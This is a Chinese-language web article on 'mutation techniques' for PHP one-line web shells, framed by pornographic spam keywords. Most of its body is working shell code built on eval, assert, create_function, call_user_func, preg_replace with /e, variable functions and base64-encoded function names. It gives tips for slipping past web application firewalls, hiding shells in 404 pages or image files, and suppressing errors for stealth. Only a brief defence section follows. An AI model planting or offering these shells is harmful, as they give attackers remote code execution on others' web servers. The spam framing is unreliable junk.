av一区二区在线观看_亚洲男人的天堂网站_日韩亚洲视频_在线成人免费_欧美日韩精品免费观看视频_久草视

您的位置:首頁技術(shù)文章
文章詳情頁

php一句話木馬變形技巧

瀏覽:120日期:2022-09-08 08:07:35
一、什么是一句話木馬?

一句話木馬就是只需要一行代碼的木馬,短短一行代碼,就能做到和大馬相當(dāng)?shù)墓δ堋榱死@過waf的檢測,一句話木馬出現(xiàn)了無數(shù)中變形,但本質(zhì)是不變的:木馬的函數(shù)執(zhí)行了我們發(fā)送的命令。

二、我們?nèi)绾伟l(fā)送命令,發(fā)送的命令如何執(zhí)行?

我們可以通過 GET、POST、COOKIE這三種方式向一個網(wǎng)站提交數(shù)據(jù),一句話木馬用 $_GET[’ ’]、$_POST[’ ’]、$_COOKIE[’ ’]接收我們傳遞的數(shù)據(jù),并把接收的數(shù)據(jù)傳遞給一句話木馬中執(zhí)行命令的函數(shù),進而執(zhí)行命令。 所以看到的經(jīng)典一句話木馬大多都是只有兩個部分,一個是可以執(zhí)行代碼的函數(shù)部分,一個是接收數(shù)據(jù)的部分。

0.eval函數(shù)

<?php eval($_POST[’a’]) ?>

其中eval就是執(zhí)行命令的函數(shù),**$_POST[‘a(chǎn)’]**就是接收的數(shù)據(jù)。eval函數(shù)把接收的數(shù)據(jù)當(dāng)作PHP代碼來執(zhí)行。這樣我們就能夠讓插入了一句話木馬的網(wǎng)站執(zhí)行我們傳遞過去的任意PHP語句。這便是一句話木馬的強大之處。

因為木馬是接收post請求中 “a” 的數(shù)據(jù)( $_POST[‘a(chǎn)’]),所以我們必須以post方法發(fā)送數(shù)據(jù)并且將我們要執(zhí)行的代碼賦值給“a”。如果把木馬中的post替換成get,那么我么就需要以GET方法發(fā)送“a”,

使用 其他函數(shù)制作一句話木馬

1.assert函數(shù)

<?php assert(@$_POST[’a’]); ?>2.create_function函數(shù)

<?php$fun = create_function(’’,$_POST[’a’]);$fun();?>

把用戶傳遞的數(shù)據(jù)生成一個函數(shù)fun(),然后再執(zhí)行fun()

3. call_user_func回調(diào)函數(shù)

<?php@call_user_func(assert,$_POST[’a’]);?>

call_user_func這個函數(shù)可以調(diào)用其它函數(shù),被調(diào)用的函數(shù)是call_user_func的第一個函數(shù),被調(diào)用的函數(shù)的參數(shù)是call_user_func的第二個參數(shù)

這樣的一個語句也可以完成一句話木馬。一些被waf攔截的木馬可以配合這個函數(shù)繞過waf。

4.preg_replace函數(shù)

<?php@preg_replace('/abcde/e', $_POST[’a’], 'abcdefg');?>

這個函數(shù)原本是利用正則表達式替換符合條件的字符串,但是這個函數(shù)有一個功能——可執(zhí)行命令

這個函數(shù)的第一個參數(shù)是正則表達式,按照PHP的格式,表達式在兩個“/”之間。如果我們在這個表達式的末尾加上“e”,那么這個函數(shù)的第二個參數(shù)就會被當(dāng)作代碼執(zhí)行。

5. file_put_contents函數(shù)

利用函數(shù)生成木馬

<?php$test=’<?php $a=$_POST['cmd'];assert($a); ?>’;file_put_contents('Trojan.php', $test);?>

函數(shù)功能:生成一個文件,第一個參數(shù)是文件名,第二個參數(shù)是文件的內(nèi)容。

6.array數(shù)組

<?php$a=’assert’;array_map('$a',$_REQUEST);?>

上述定義參數(shù)a并賦值‘a(chǎn)ssert’,利用array_map()函數(shù)將執(zhí)行語句進行拼接。最終實現(xiàn)assert($_REQUEST)。

<?php$item[’JON’]=’assert’;$array[]=$item;$array[0][’JON’]($_POST['TEST']);?>

利用函數(shù)的組合效果,使得多個參數(shù)在傳遞后組合成一段命令并執(zhí)行。

php一句話木馬變形技巧

php一句話木馬變形技巧

7.PHP變量函數(shù)

<?php$a = 'eval';$a(@$_POST[’a’]);?>

第三行使用了變量函數(shù)$a,變量儲存了函數(shù)名eval,便可以直接用變量替代函數(shù)名。

三、如何讓一句話木馬繞過waf ?

waf是網(wǎng)站的防火墻,例如安全狗就是waf的一種。waf通常以關(guān)鍵字判斷是否為一句話木馬,但是一句話木馬的變形有很多種,waf根本不可能全部攔截。想要繞過waf,需要掌握各種PHP小技巧,掌握的技巧多了,把技巧結(jié)合起來,設(shè)計出屬于自己的一句話木馬。

1.PHP可變變量

<?php$bb='eval';$aa='bb';$$aa($_POST[’a’]);?>

看這句就能理解上述語句:$$aa = ( ( (aa) = $ (‘bb’) = $bb = “eval”

2.str_replace函數(shù)

<?php$a=str_replace('Waldo', '', 'eWaldoval');$a(@$_POST[’a’]);?>

函數(shù)功能:在第三個參數(shù)中,查找第一個參數(shù),并替換成第二個參數(shù)。這里第二個參數(shù)為空字符串,就相當(dāng)于刪除'Waldo'。

3. base64_decode函數(shù)

<?php$a=base64_decode('ZXZhbA==')$a($_POST[’a’]);?>

這里是base64解密函數(shù),'ZXZhbA=='是eval的base64加密。

4.'.'操作符

<?php$a='e'.'v';$b='a'.'l';$c=$a.$b;$c($_POST[’a’]);?>5.parse_str函數(shù)

<?php$str='a=eval';parse_str($str);$a($_POST[’a’]);?>

執(zhí)行這個函數(shù)后,生成一個變量$a,值為字符串'eval'

6.更換數(shù)據(jù)來源

6.1GET篇

<?php $_GET[a]($_GET[b]); ?>

<?php @eval( $_GET[$_GET[b]])>

利用方法:

b=cmd&cmd=phpinfo()

6.2利用script代替<? 、?>標(biāo)簽

<script language='php'>@eval_r($_GET[b])</script>

6.3利用session

php一句話木馬變形技巧

7.字符替換或特殊編碼

php一句話木馬變形技巧

php一句話木馬變形技巧

8.木馬藏匿

1.404頁面

2.圖片木馬,用文件包含調(diào)用

四、總結(jié)

繞過技巧:

更換執(zhí)行數(shù)據(jù)來源 字符替換或者編碼 采取隱匿手段

tips:使用一句話木馬的時候可以在函數(shù)前加”@”符,這個符號讓php語句不顯示錯誤信息,增加隱蔽性。

五、防御

1.禁用assert()函數(shù),監(jiān)控eval()2.搜索日志的assert。亦可能繞過:

<?php $c=$_GET[n].’t’; @$c($_POST[cmd]); ?>

<?php $c=base64_decode(’YXNzZXI=’).$_GET[n].’t’; @$c($_POST[cmd]); ?>

php一句話木馬變形技巧

以上就是php一句話木馬變形技巧的詳細內(nèi)容,更多關(guān)于php一句話木馬變形技巧的資料請關(guān)注好吧啦網(wǎng)其它相關(guān)文章!

標(biāo)簽: PHP
相關(guān)文章:
主站蜘蛛池模板: 欧美大片18| 国产精品高潮呻吟av | www黄色片| 毛片资源| 51免费看成人啪啪片 | 在线h片 | 日本中文字幕一区 | 狠狠草视频 | 99精品久久 | 日韩在线中文字幕 | 精品少妇3p | 天堂网中文在线 | 日本国产精品 | 成人免费看片在线观看 | 日韩精品久久久久久久酒店 | 欧美91视频 | 国产精品一区二区三区四区五区 | 欧美精品www | 日本精品国产 | 高h乱l高辣h文短篇h | 国产午夜三级 | 激情av在线 | 中文字幕有码在线 | 亚洲精品大片 | 欧美成人精品一区二区三区 | 免费黄色在线 | 亚洲高清在线视频 | 日韩性视频 | av一区二区在线观看 | 亚洲视频在线播放 | 色吧综合 | 婷婷中文网 | 国产三级成人 | 51av视频 | 中文字幕国产一区 | 国产亚洲区 | 欧美vieox另类极品 | 人人射人人干 | 国产成人a亚洲精品 | 天天干天天操天天爽 | 亚洲无人区一线二线三线 |